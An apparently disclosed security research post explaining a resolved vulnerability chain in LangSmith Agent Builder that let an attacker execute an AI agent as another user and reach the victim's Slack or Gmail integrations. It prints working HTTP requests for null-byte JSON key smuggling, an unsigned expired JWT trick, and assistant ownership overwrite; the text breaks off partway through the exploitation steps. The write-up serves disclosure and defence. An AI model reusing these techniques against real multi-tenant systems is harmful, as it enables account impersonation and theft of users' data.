# Executing AI agent on behalf another user in LangSmith Agent Builder (Resolved)

## Introduction

This post is the third part of my research series on LangSmith — see the [first](https://0xn3va.gitbook.io/blog/2026/langsmith-unsafe-formatting-to-rce) and [second](https://0xn3va.gitbook.io/blog/2026/langsmith-chaining-service-key-leakage-and-path-confusion) posts for prior context. In this part, I turn my attention to the recently launched LangSmith Agent Builder, a no-code platform for creating AI agents. This research examines the agent's underlying architecture and the chain of vulnerabilities that led to user impersonation during agent execution.

Note: Agent Builder has since been rebranded as LangSmith Fleet. The functionality has changed slightly since then, but all the key details remain relevant. This post uses the Agent Builder name, as the vulnerability was discovered prior to the rebranding.

## TL;DR

This post describes a vulnerability in LangSmith Agent Builder that could allow an attacker to execute an AI agent on behalf of another user. The attack chain combined four weaknesses: (1) Agent Server did not validate the run configuration against a strict schema, allowing redundant fields to be stored alongside the actual execution data; (2) null bytes in JSON keys were silently stripped during serialisation, enabling a duplicate key to be smuggled into the configuration and overwrite the user identity set by Agent Server; (3) the agent did not verify the `X-Service-Key` JWT signature during token refresh, allowing an attacker to generate a valid service key scoped for a victim; (4) access control on assistants did not prevent ownership metadata from being overwritten, allowing an attacker to transfer an assistant to a victim's account. Chaining these issues granted full access to any third-party integrations — such as Slack, Gmail, or Google Calendar — that the victim had previously configured.

Note: This research details a vulnerability that was responsibly disclosed to the LangChain team and fully remediated within the hours of the initial report. LangChain has confirmed there is no evidence of this issue being exploited in the wild. This write-up is being shared strictly for educational purposes to highlight the technical nuances of securing AI agents in a multi-tenant cloud environment.

## Agent Builder Overview

LangSmith Agent Builder is an agent designed to create helpful AI agents directly from LangSmith without any code. Users can fully customise their agents by providing instructions and skills, creating sub-agents, adding MCP servers and tools, and integrating with third-party services, e.g. Gmail, GitHub, Slack, etc. For example, creating an agent to summarise a user's schedule for a day would include the following steps:

1. Add an instruction (prompt) to define the agent's role and what is expected from it; e.g. "You are a personal assistant who reads all events scheduled for today, prepares a plan for the day and sends it to Slack. You should focus on ..."
2. Add necessary tools to list events in Google Calendar and send messages to Slack.
3. Set up integration with Google Calendar and Slack.
4. Add a trigger to schedule runs at 8AM for every day.

![Schedule Planner Agent](https://32049783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo2KSUh1xGnBK1FA4q0CR%2Fuploads%2Fgit-blob-8a5eeeba888fdf6efb49cf4003333c48b1df3f01%2Fschedule_planner_agent.png?alt=media)

After the creation, this agent will be triggered every morning at 8AM to read events for the day from Google Calendar, prepare a schedule and send it to Slack.

## LangSmith Deployment Overview

Before diving into the Agent Builder's architecture, it is worth explaining a few key concepts of the LangSmith ecosystem. One of the features LangSmith provides is an infrastructure layer for agents called [LangSmith Deployment](https://docs.langchain.com/langsmith/deployment). It can be thought of as a standardised interface for building and deploying agents, where a user is only required to implement agent logic while the infrastructure and management layers are automatically provisioned. This is achieved through deploying an agent as Agent Server that serves as underlying framework and provides [an API for creating and managing agents](https://docs.langchain.com/langsmith/server-api-ref). A user builds an application on top of Agent Server that allows them to manage their application using the offered API (same for any agent).

Agent Server is built on the concept of [graphs](https://docs.langchain.com/langsmith/agent-server#graphs), [assistants](https://docs.langchain.com/langsmith/assistants), [threads](https://docs.langchain.com/oss/python/langgraph/persistence#threads) and [runs](https://docs.langchain.com/langsmith/assistants#execution).

* **Graph** is a LangGraph graph that contains the agent logic.
* **Assistant** is a graph paired with specific configuration settings. It can be considered as an instance of a graph. Assistants allow mananging graph configuration (prompts, LLM configurations, tools, etc.) separately from its logic, e.g. a user can create multiple assistants of the same graph with different behaviour at runtime.
* **Thread** is a collection of [checkpoints](https://docs.langchain.com/oss/python/langgraph/persistence#checkpoints) with the graph's state at every [super-step](https://docs.langchain.com/oss/python/langgraph/graph-api). This implements the [persistence layer](https://docs.langchain.com/oss/python/langgraph/persistence) that allows access to graph's state after execution.
* **Run** is an invocation of an assistant.

The relationship between these concepts is reflected on the diagram below from the [documentation](https://docs.langchain.com/langsmith/assistants#execution).

![Agent Execution Diagram](https://32049783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo2KSUh1xGnBK1FA4q0CR%2Fuploads%2Fgit-blob-8cafc77c38f4eb141d02faebc4f368ff07f01a6b%2Fagent_execution.png?alt=media)

This diagram shows how a run combines an assistant with a thread to execute the graph:

* **Graph (blue)**: The deployed code containing the agent's logic.
* **Assistants (light blue)**: Configuration options (model, prompts, tools).
* **Threads (orange)**: State containers for conversation history.
* **Runs (green)**: Executions that pair an assistant + thread.

Example combinations:

* **Run: A1 + T1**: Assistant 1 configuration applied to User A's conversation.
* **Run: A1 + T2**: Same assistant serving User B (different conversation).
* **Run: A2 + T1**: Different assistant applied to User A's conversation (configuration switch).

When a user deploys an Agent Server application, they are deploying one or more [graphs](https://docs.langchain.com/langsmith/application-structure#graphs), a database for [persistence](https://docs.langchain.com/langsmith/agent-server#persistence-and-task-queue) and a [task queue](https://docs.langchain.com/langsmith/agent-server#persistence-and-task-queue). The Agent Server API provides endpoints for creating and managing assistants, threads, runs, and more. Using these endpoints a user can interact with the deployed agent.

## Agent Server Authentication and Access Control

Agent Server is created based on LangGraph where authentication and authorisation are handled by [@auth.authenticate](https://reference.langchain.com/python/langsmith/deployment/sdk/#langgraph_sdk.auth.Auth.authenticate) and [@auth.on](https://reference.langchain.com/python/langsmith/deployment/sdk/#langgraph_sdk.auth.Auth.on) handlers. LangGraph calls user's `@auth.authenticate` handler on every request to validate credentials and return user information, e.g.:

```python
from langgraph_sdk import Auth

auth = Auth()

@auth.authenticate
async def authenticate(headers: dict) -> Auth.types.MinimalUserDict:
    if not is_authenticated(headers):
        raise Auth.exceptions.HTTPException(
            status_code=401,
            detail="Auth failed"
        )
    return {
        "identity": "user_id",
        # ...
    }
```

After authentication, user's `@auth.on` handlers are called to control access to specific resources, e.g. assistants, threads, etc. The implementation of access control logic is based on metadata contained in the payload sent to the handler. For example, the code snippet below contains two handlers for the `create` and `read` actions for assistants. The `@auth.on.assistants.create` handler stores the owner identity in metadata during creation, while the `@auth.on.assistants.read` handler uses a [filter dictionary](https://docs.langchain.com/langsmith/auth#filter-operations) to check whether the current user matches the stored identity. This ensures that read access to the assistant is granted only to the user who created it.

```python
@auth.on.assistants.create
async def on_assistants_create(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.create.value,
):
    metadata = value.setdefault("metadata", {})
    metadata["identity"] = ctx.user.identity

@auth.on.assistants.read
async def on_assistants_read(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.read.value,
):
    return {
        "identity": ctx.user.identity,
    }
```

See the [documentation](https://docs.langchain.com/langsmith/auth) for more details and examples.

## Agent Builder Architecture

After getting familiar with LangSmith Deployment and Agent Server, we can take a closer look at Agent Builder. Agent Builder is an Agent Server application for creating and running user agents. It is deployed with two graphs `deep_agent_generator` and `deep_agent`. `deep_agent_generator` implements the agent builder logic for creating new agents from the UI based on user requests. `deep_agent` implements the core logic for users' agents created manually or using `deep_agent_generator`. Creating a new agent means creating a new assistant with the `deep_agent` graph and custom configuration settings. As a result, Agent Builder hosts agents for all users and is responsible for controlling access to resources.

`deep_agent` is built on [Deep Agents](https://docs.langchain.com/oss/python/deepagents/overview) that provides an agent harness with builtin capabilities for task planning, file systems for context management, subagent-spawning, and long-term memory. Essentially, `deep_agent` is a general-purpose agent that can be configured to handle any task by providing instructions, skills, and tools. This makes no-code agent creation possible because a user does not need to implement the tool calling loop alongside the rest of the agent's internal logic.

While there are many technical details that could be explored thoroughly, it is worth focusing on three main aspects necessary to understand the vulnerability:

* Long-term memory.
* Tools and integrations.
* Authentication.

**Long-term memory**

`deep_agent` has access to a store backend which serves as persistent storage. This enables a [long-term memory](https://docs.langchain.com/oss/python/deepagents/long-term-memory) where files can persist across threads.

```mermaid
flowchart LR
    deep_agent[Deep Agent]
    path_router{Path Router}
    store_backend[Store Backend]
    state_backend[State Backend]
    persistent_storage[(Persistent<br>across threards)]
    ephemeral_storage[(Ephemeral<br>single thread)]

    deep_agent --> path_router
    path_router --> |/memories/*| store_backend
    path_router --> |other| state_backend
    store_backend --> persistent_storage
    state_backend --> ephemeral_storage
```

For example, the long-term memory stores user's instructions (`/memories/AGENTS.md`), available tools (`/memories/tools.json`) and subagents (`/memories/subagents/*`).

Agent Builder uses a PostgreSQL database as a store backend and files there are accessed via a pair `(namespace, key)` where `namespace` consists of an assistant ID and the `filesystem` literal, e.g. `3ddf47dc-dfc8-4329-a92b-07e5535fcc35.filesystem`, while the `key` contains a path to a file, e.g. `/AGENTS.md`. This can be seen by retrieving a single item using the [Agent Server API](https://docs.langchain.com/langsmith/agent-server-api/store).

```http
GET /store/items?key=/AGENTS.md&namespace=3ddf47dc-dfc8-4329-a92b-07e5535fcc35.filesystem HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
x-auth-scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
```

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "namespace": ["3ddf47dc-dfc8-4329-a92b-07e5535fcc35", "filesystem"],
    "key": "/AGENTS.md",
    "value": {
        "content": ["You are a helpful agent"],
        "created_at": "2026-01-30T09:42:48.316Z",
        "modified_at": "2026-01-30T09:42:48.316Z"
    },
    "created_at": "2026-01-30T09:42:48.362763+00:00",
    "updated_at": "2026-01-30T09:42:48.362763+00:00"
}
```

**Tools and integrations**

By default, `deep_agent` comes with [built-in tools](https://docs.langchain.com/oss/python/deepagents/harness#file-system-access) inherited from `Deep Agents` for accessing the file system, such as `ls`, `read_file`, and `write_file`. Additionally, LangSmith provides a default MCP server `[eu.]tools.langchain.com` with [a variety of tools](https://docs.langchain.com/langsmith/agent-builder-tools) that give agents access to emails, calendars, chats, code, web utilities, and more.

```mermaid
flowchart LR
    agent_builder[Agent Builder]
    third_party[Google, GitHub,<br/>Slack, etc]

    agent_builder --> |call tools| mcp
    mcp --> |access resources| third_party

    subgraph LangSmith[LangSmith]
        mcp[MCP]
        backend[Backend]

        mcp --> |get creds| backend
    end
```

Obviously, the default tools require access to third-party services like Google, GitHub, or Slack to work. There are two types of integrations supported. The first type uses credentials to authenticate with a third-party service. A user adds required credentials (e.g. API token) to workspace secrets, and the MCP server retrieves these credentials by requesting [LangSmith Backend](https://api.smith.langchain.com/docs) every time an agent calls a tool. The second type uses OAuth to obtain an access token for a third-party service. A user sets up a connection with an OAuth provider and grants access to resources with required permissions. The MCP server uses the established connection to generate an active access token required for tool execution. It is worth noting that once a connection is established, the MCP server can generate active tokens with the same scope until the integration is removed. The OAuth integrations are managed by [LangSmith Host Backend](https://api.host.langchain.com/docs) and the described behaviour can be observed by requesting the `POST /v2/auth/authenticate` endpoint. The request below initiates authentication in Slack for a user with provided `user_id` and `scopes`.

```http
POST /v2/auth/authenticate HTTP/1.1
Host: api.host.langchain.com
X-API-Key: <api_key>
Content-Type: application/json

{
    "user_id":"6a6e9e8f-b881-4f4d-990e-77c3a538a588",
    "provider":"slack-agent-builder",
    "scopes":["users:read"],
    "use_agent_builder_public_oauth": true
}
```

Since this is the first time a user is setting up the integration, the server returns a URL to authorise the requested access to Slack.

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "status": "pending",
    "url": "https://slack.com/oauth/v2/authorize?client_id=4518649543379.9651146644741&redirect_uri=https%3A%2F%2Fsmith.langchain.com%2Fhost-oauth-callback%2Fslack-agent-builder&scope=users%3Aread&response_type=code&state=BJUJ0z_xZDdoqVQ7BP3KSO2Gc5nbFIgrL2PXcL6-6LQ&access_type=offline&prompt=consent",
    "auth_id": "BJUJ0z_xZDdoqVQ7BP3KSO2Gc5nbFIgrL2PXcL6-6LQ",
    "token": null
}
```

Once the access is granted, access tokens can be generated by sending the same request again.

```http
POST /v2/auth/authenticate HTTP/1.1
Host: api.host.langchain.com
X-API-Key: <api_key>
Content-Type: application/json

{
    "user_id":"6a6e9e8f-b881-4f4d-990e-77c3a538a588",
    "provider":"slack-agent-builder",
    "scopes":["users:read"],
    "use_agent_builder_public_oauth": true
}
```

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "status": "completed",
    "url": null,
    "auth_id": null,
    "token": "xoxb-81120257253410-9202564180440-eH3AoACl7LXMojRZ11TlciD"
}
```

**Authentication**

Agent Builder implements multiple authentication schemes, relying on the LangSmith Platform Backend for authentication. The most important are the `langsmith-agent` and `langsmith-api-key` schemes, which allow authentication using the `Authorization`, `X-API-Key`, and `X-Service-Key` headers. Both schemes return the user information from the snippet below.

```python
{
    "identity": ls_user_id,
    "organization_id": organization_id,
    "tenant_id": tenant_id,
    "ls_user_id": ls_user_id,
    "agent_builder_passthrough_headers": encrypted_passthrough_headers,
    # ...
}
```

In addition to standard fields such as `tenant_id` and `ls_user_id`, the user information contains `agent_builder_passthrough_headers` with HTTP headers encrypted with a secret key. These headers are passed to an agent at runtime, and the agent uses them to authenticate users to the default MCP server. The passthrough headers include the common set of headers used for authentication in LangSmith.

```python
{
    "X-Organization-Id": organization_id,
    "X-Tenant-Id": tenant_id,
    "X-User-Id": ls_user_id,
    "X-Service-Key": get_x_service_jwt_token(payload),
    # ...
}
```

One of the headers is `X-Service-Key` with a service key scoped for the organisation, tenant and user. This key is generated by Agent Builder during authentication and added to the passthrough headers. `X-Service-Key` is a header used for authentication at runtime.

## Overwriting Run Configuration

The root cause of the vulnerability lay in the run creation logic on Agent Server. It was possible to overwrite the run configuration and control fields that were not intended to be controlled by a user. Let's look at how runs are created and executed to understand the issue. Agent Server provides several endpoints to create and execute a run. For example, the `POST /threads/<thread_id>/runs/wait` endpoint creates a run in an existing thread and waits for the final output. The request and response for this endpoint look like these:

```http
POST /threads/<thread_id>/runs/wait HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
X-Auth-Scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
Content-Type: application/json

{
    "input": {
        "messages": [
            {
                "id": "266eab49-84eb-4efa-ad14-7fe05c25e6dc",
                "type": "human",
                "content": "Hi, how are you?"
            }
        ]
    },
    "assistant_id": "<assistant_id>"
}
```

```http
HTTP/1.1 200 OK
Content-Type: application/json
Location: /threads/<thread_id>/runs/<run_id>/join
Content-Location: /threads/<thread_id>/runs/<run_id>

{
    "messages":[
        {
            "content": "Hi, how are you?",
            "type": "human",
            // ...
        },
        {
            "content": "Hello! I'm doing well, thank you for asking! ...",
            "type": "ai",
            // ...
        }
    ],
    "tools": []
}
```

The request contains a message from a user addressed to a specified assistant, and the response contains the conversation within the current thread. The created run can be seen using the `GET /threads/<thread_id>/runs/<run_id>` endpoint.

```http
GET /threads/<thread_id>/runs/<run_id> HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
x-auth-scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
```

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "run_id": "<run_id>",
    "thread_id": "<thread_id>",
    "assistant_id": "<assistant_id>",
    "status": "success",
    // ...
    "kwargs": {
        "input": {
            "messages": [{
                "id": "fb2ed1bc-105f-40a7-8514-03d706d85a3a",
                "type": "human",
                "content": "Hi, how are you?"
            }]
        },
        "config": {
            "configurable": {
                // ...
                "langgraph_auth_user_id": "<user_id>",
                "langgraph_auth_user": {
                    "identity": "<user_id>",
                    "tenant_id": "<tenant_id>",
                    "ls_user_id": "<user_id>",
                    "agent_builder_passthrough_headers": "gAAAAABpkJK9vcMkhPuhNlpLbiBL5WVvA77igqmdJcxsQ...",
                    // ...
                }
            },
            // ...
        },
        // ...
    }
}
```

The response contains the run details including all arguments passed to the agent. The most interesting field in the run details is `kwargs.config.configurable.langgraph_auth_user`, which contains information about the current user set during authentication. This field is used to initialise the context and define the current user at runtime. In other words, `langgraph_auth_user` defines the user on whose behalf the run will be executed.

At the high-level, the run execution consists of the following steps:

1. A user sends a request to `POST /threads/<thread_id>/runs/wait`.
2. Agent Server authenticates the user and adds user information to the global context.
3. Agent Server parses the payload from the request, writes several fields to the configuration, including `langgraph_auth_user`, and creates a new run in PostgreSQL database.
4. The worker on Agent Server picks up the run, initialises the global context using the user information from `langgraph_auth_user`, and executes the graph.
5. Agent Server waits for the run to complete and returns the output in the response.

The most interesting aspect of this flow is storing run data in the database. The `config` from `kwargs` is stored as JSON data using the [JSONB](https://www.postgresql.org/docs/current/datatype-json.html) PostgreSQL type. Using this type requires an adapter to convert a Python object to a JSONB PostgreSQL value. Agent Server uses [psycopg.types.json.Jsonb](https://www.psycopg.org/psycopg3/docs/api/types.html#psycopg.types.json.Jsonb) as such an adapter. In the code it looks like this:

```python
from psycopg.types.json import Jsonb

class Runs(Authenticated):
    # ...
    @staticmethod
    async def put(
        conn: AsyncConnection[DictRow],
        assistant_id: UUID,
        kwargs: dict,
        # ...
    ) -> AsyncIterator[Run]:
        # ...
        params = {
            "kwargs": Jsonb(kwargs),
            "config": Jsonb(kwargs.get("config")),
            # ...
        }
        # ...
        cur = await conn.execute(query, params, binary=True)
        # ...
```

As can be seen from the code snippet, `Jsonb` only accepts an object but it has a second optional argument `dumps` that accepts a function to dump the given object. These lines caught my attention during reading [the documentation for psycopg.types.json.Jsonb](https://www.psycopg.org/psycopg3/docs/api/types.html#psycopg.types.json.Jsonb):

> If a dumps function is passed to the wrapper, use it to dump the wrapped object. Otherwise use the function specified by set\_json\_dumps().

Search for the `set_json_dumps()` function revealed its usage and setting the default dump function to the `json_dumpb()` function with the dumping functionality based on the `orjson` library.

```python
async def _configure_connection(conn: AsyncConnection[DictRow]):
    set_json_dumps(json_dumpb, conn)
    # ...
```

```python
def json_dumpb(obj) -> bytes:
    try:
        dumped = orjson.dumps(obj, default=default, option=_option)
    except TypeError as e:
        # ...
    return dumped.replace(b"\\\\u0000", b"").replace(b"\\u0000", b"")
```

In addition to dumping the object, `json_dumpb()` performs an extra step to remove null bytes from the dumped data. This step was most likely added to prevent errors in PostgreSQL, as JSONB can't contain null bytes.

By the time I discovered this, I was looking for possible ways for executing a run on behalf of another user. Understanding that everything was tied to the data passed to `langgraph_auth_user`, I tried to find a way to control data in this field. It was impossible directly because the Agent Server overwrote `langgraph_auth_user` with the current user's data. On the other hand, Agent Server did not validate the input data against a strict schema during run creation and stored redundant and unused data in the database alongside the data actually used for execution. The removal of null bytes during conversion of Python objects to PostgreSQL JSONB suggested that I could potentially add a null byte to a key inside the configuration, which would be passed unchanged to `json_dumpb()`. After dumping and removing null bytes, this smuggled key would become a duplicate for the key that I could not control due to restrictions implemented on Agent Server. As a result, PostgreSQL would receive a JSONB with duplicate keys and will simply choose the last key according to the "last wins" resolution strategy.

I sent the request below to test the possibility of smuggling a key in JSON data and received a quite promising response.

```http
POST /threads/<thread_id>/runs/wait HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
X-Auth-Scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
Content-Type: application/json

{
    "input": {
        "messages": [
            {
                "id": "266eab49-84eb-4efa-ad14-7fe05c25e6dc",
                "type": "human",
                "content": "Hi, how are you?"
            }
        ]
    },
    "config": {
        "configurable": {},
        "configurable\u0000": {}
    },
    "assistant_id": "<assistant_id>"
}
```

```http
HTTP/1.1 200 OK
Content-Type: application/json
location: /threads/<thread_id>/runs/<run_id>/join
content-location: /threads/<thread_id>/runs/<run_id>

{
    "__error__": {
        "error": "ValueError",
        "message": "Missing Agent Builder passthrough headers"
    }
}
```

This was a good sign because Agent Server could not find the `agent_builder_passthrough_headers` field, which meant the smuggled `configurable\u0000` key overwrote `configurable` prepared by Agent Server before saving data to the database.

## Generating Service Key for Another User

Unfortunately, overwriting the configuration data was not sufficient to execute runs in the context of a different user, since tool execution and access to integrations depended on credentials passed in the `agent_builder_passthrough_headers` field. While reviewing how Agent Builder calls tools, I came across the `ServiceKeyAuth` class, which is used to add headers to MCP requests. This class inherits `httpx.Auth` and it is passed to clients created for each MCP server. In other words, Agent Builder creates a separate HTTP client for a MCP, which an agent invokes at runtime to call the tool loaded from that MCP. The most interesting feature of `ServiceKeyAuth` is that it optionally refreshes a service key if it is present in the headers. The refresh is optional as it is only used for the default MCP, while for user MCPs the refresh is disabled.

```python
class ServiceKeyAuth(httpx.Auth):
    def __init__(self,
        initial_headers: dict[str, str],
        *,
        enable_service_key_refresh: bool,
    ) -> None:
        self.headers = initial_headers.copy()
        self.enable_service_key_refresh = enable_service_key_refresh
        if self.enable_service_key_refresh:
            self._ensure_service_key_is_fresh()

    # ...

    def _ensure_service_key_is_fresh(self) -> None:
        # ...
        if _is_service_key_expiring_soon(service_key):
            self.headers = _regenerate_service_key(self.headers)
```

`ServiceKeyAuth` accepts `initial_headers`, which are retrieved from the `agent_builder_passthrough_headers` field. If `X-Service-Key` is present among the passed headers and has expired or is close to expiration, `ServiceKeyAuth` refreshes it during initialisation or execution. The code below contains the functions responsible for refreshing the service key.

```python
def _is_service_key_expiring_soon(
    service_key: str, threshold_seconds: int = 60
) -> bool:
    payload = _decode_jwt_payload(service_key)
    exp = payload.get("exp")
    if not exp:
        return False

    current_time = time.time()
    return (exp - current_time) <= threshold_seconds

def _regenerate_service_key(headers: dict[str, str]) -> dict[str, str]:
    from langgraph_api.utils import get_auth_ctx

    auth_ctx = get_auth_ctx()
    user = auth_ctx.user or {}
    # ...
    tenant_id = user.get("tenant_id") or passthrough_headers.get("X-Tenant-Id")
    ls_user_id = user.get("ls_user_id") or passthrough_headers.get("X-User-Id")
    organization_id = user.get("organization_id") or passthrough_headers.get(
        "organization_id"
    )

    payload: dict[str, str] = {}
    if tenant_id:
        payload["tenant_id"] = tenant_id
    if ls_user_id:
        payload["user_id"] = ls_user_id
    if organization_id:
        payload["organization_id"] = organization_id

    new_service_key = get_x_service_jwt_token(payload=payload)

    # ...
```

`_is_service_key_expiring_soon()` decodes a service key and gets the `exp` claim from the payload to validate its expiration time. `_decode_jwt_payload()` does not verify the JWT signature; it simply extracts the payload by splitting the service key at the dot `.` and base64-decoding the second part.

`_regenerate_service_key()` retrieves the user information from the global context, gets `organization_id`, `tenant_id` and `user_id` from there and creates a new service key using this data. Since this code is executed at runtime, `get_auth_ctx()` returns the global context initialised by the worker using data retrieved from the database. In other words, the user information contains data taken from the `langgraph_auth_user` field.

This meant that overwriting the run configuration and passing an expired or near-expired service key inside `agent_builder_passthrough_headers` allowed generating a service key scoped for any user, tenant, and organisation. However, Agent Builder uses `agent_builder_passthrough_headers` during agent initialisation to call various API endpoints to collect all necessary resources, such as workspace secrets or user MCP servers. Additionally, only the `Authorization` and `X-Service-Key` headers can be present in `agent_builder_passthrough_headers`, because other authentication headers are discarded during processing. Therefore, passing a valid token in `Authorization` and an expired service key (or an unsigned JWT with the `exp` claim in the payload) in `X-Service-Key` was not an option, as it would result in authentication failure due to the higher priority of `X-Service-Key` over `Authorization`. It was potentially possible to create a run, copy the `agent_builder_passthrough_headers` with the active (for 5 minutes) `X-Service-Key` from that run, and create a new run at the correct time when the key is still active but will expire within a minute. However, I found a way to avoid these complications and set an arbitrary `X-Service-Key` only for `ServiceKeyAuth`.

Agent Builder supports user MCP servers in addition to the default MCP. When a user adds a MCP they can select the `Static Headers` authentication method and specify any headers. Agent Builder obtains these headers from LangSmith Platform Backend when loading tools from the MCP with the corresponding URL. The received headers are passed to `ServiceKeyAuth` as `initial_headers`, which includes them in requests to the MCP. Eventually, it was possible to add a MCP with the URL of the default MCP `https://[eu.]tools.langchain.com/mcp` and required headers, which would be combined with `agent_builder_passthrough_headers` and passed to `ServiceKeyAuth` as `initial_headers`. These static headers did not affect agent initialisation in any way, as they are not used outside tool loading and calling.

One final piece is that Agent Builder supports both a string with encrypted headers and a dictionary of raw headers in `agent_builder_passthrough_headers`. Raw headers support gives the full control over the headers used during initialisation.

## Almost There...

Putting together all these details, the attack consists of the following steps:

1. An attacker adds a MCP server with:
   * URL set to `https://[eu.]tools.langchain.com/mcp`.
   * `X-Service-Key` header set to an unsigned JWT with the expired timestamp in the `exp` claim.
   * `X-Tenant-Id` header set to a tenant ID of a victim.
2. An attacker creates a run with overwritten `langgraph_auth_user` where:
   * `identity`, `tenant_id` and `ls_user_id` set to a tenant ID and a user ID of a victim.
   * `agent_builder_passthrough_headers` with:
     * `Authorization` header with a valid token of an attacker.
     * `X-Tenant-Id` header with a tenant ID of an attacker.
3. Agent Builder saves the run to database and a worker picks up the run for execution.
4. The worker initialise the global context using overwritten `langgraph_auth_user`, sets a victim user as the current user and starts graph execution.
5. Agent Builder uses `Authorization` for agent initialisation to retrieve necessary resources.
6. Agent Builder adds `X-Service-Key` and `X-Tenant-Id` headers from the step 1 to `ServiceKeyAuth` during tool loading.
7. `ServiceKeyAuth` checks the `exp` claim in `X-Service-Key`, generates new service key scoped for a victim, and assigns it to `X-Service-Key`.
8. Any further requests to the default MCP are sent with `X-Service-Key` scoped for a victim and an attacker has full access to third-party integrations established earlier by a victim.

To reproduce this behaviour, I created an agent with access to the `read_url_content` tool and created a run with the following message: "read content from <https://foo.site> and write a summary here". When the run was completed, I saw that the agent failed to use the tool with the following error:

> Error: read\_url\_content is not a valid tool, try one of \[write\_todos, ls, read\_file, write\_file, edit\_file, glob, grep, execute, task, message\_user, RequestMissingTools].

After spending some time debugging and understanding the error, I came to the conclusion that the tool was not registered for the agent. In other words, the agent did not have a Python primitive to call the tool. I reviewed the initialisation process again and discovered a missing element. Available tools for the agent are stored on the agent's filesystem (i.e. in long-term memory), and loading the tools requires access to the store backend. If the process can't access the store backend, it can't retrieve the available tools and can't register them for the agent. This indicated an authentication issue when accessing the store backend.

The following code was responsible for accessing the store backend:

```python
namespace = (assistant_id, "filesystem")
items = await get_loopback_client().store.search_items(namespace, headers=headers)
```

The `headers` variable here contains headers from the `agent_builder_passthrough_headers` field with the attacker's `Authorization` header but the access is still denied. The reason for that is `get_loopback_client()` which returns a loopback client for local in-process connections to Agent Server API. Agent Server treats requests from this client differently and completely skips authentication for them. Meanwhile, Agent Server picks up the current user from the global context, which is set to the victim user. In other words, the agent tries to access the filesystem of the attacker's assistant with a victim user. Since a victim user has no access to the assistant the agent fails to register tools. For successful exploitation, the victim user must have access to an assistant.

## Broken Authorisation

At the beginning, I briefly described how access control is implemented on Agent Server and that `metadata` is used to keep information about a resource owner. The same mechanism is used by Agent Builder for authorisation, it sets IDs of an owner to `metadata` during creation and checks them later during further access. For example, this handler is called when an assistant is created:

```python
@auth.on.assistants.create
async def on_assistants_create(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.create.value,
):
    # ...
    metadata = value.setdefault("metadata", {})
    # ...
    metadata["ls_user_id"] = ctx.user.ls_user_id
    metadata["tenant_id"] = ctx.user.tenant_id
    # ...
```

While the next handler is called when an assistant is deleted or updated:

```python
@auth.on.assistants.delete
@auth.on.assistants.update
async def on_assistants_write(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.delete.value,
):
    # ...
    return {"ls_user_id": ctx.user.ls_user_id, "tenant_id": ctx.user.tenant_id}
```

This guarantees that a user can only delete and update assistants that contain their `ls_user_id` and `tenant_id` in `metadata`. However, the delete and update handler does not validate if the `metadata` passed in the request does not rewrite `ls_user_id` and `tenant_id`. As a result, an attacker can create an assistant and change the ownership to a victim.

## Exploitation

Finally, all the pieces can be assembled to demonstrate the attack. For the exploitation, I added a Slack integration for a victim user. My goal was to gain access to the victim's Slack channel and verify that the attacker could use the victim's configured third-party integrations. It's worth noting that the prerequisite for the attack is the victim's user and tenant IDs.

Here are the exploitation steps:

1. Create an assistant in the attacker's tenant and get `assistant_id` from the response:

   ```http
   POST /assistants HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   Content-Type: application/json
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "graph_id": "deep_agent",
       "config": {
           "configurable": {
               "configurable": {
                   "tools_url": "https://eu.tools.langchain.com",
                   "llm_model_config": {
                       "modelId": "anthropic:claude-sonnet-4-5",
                       "envVarName": "AGENT_BUILDER_ANTHROPIC_API_KEY"
                   }
               }
           }
       },
       "metadata": {},
       "name": "Support Agent",
       "description": ""
   }
   ```

   ```http
   HTTP/1.1 200 OK
   Content-Type: application/json

   {
       "assistant_id":"6f60ff77-fe98-46de-b9a6-05961fc2e238",
       ...
   }
   ```
2. Create a thread and get `thread_id` from the response:

   ```http
   POST /threads HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "metadata":{
           "is_test_run":true,
           "skip_memory_write_protection":true
       }
   }
   ```

   ```http
   HTTP/1.1 200 OK
   Content-Type: application/json

   {
       "thread_id":"6c65e2f0-56c4-41b6-a5d8-b2414fe3df27",
       ...
   }
   ```
3. Add an MCP server:

   ```http
   POST /v1/platform/mcp-servers HTTP/1.1
   Host: eu.api.smith.langchain.com
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "name": "eu_tools",
       "url": "https://eu.tools.langchain.com/mcp",
       "auth_type": "headers",
       "headers": [
           {
               "key": "X-Service-Key",
               "value": ".eyJleHAiOjE3NzAzNjU5ODd9."
           },
           {
               "key": "X-Tenant-Id",
               "value": "<victim_tenant_id>"
           }
       ]
   }
   ```

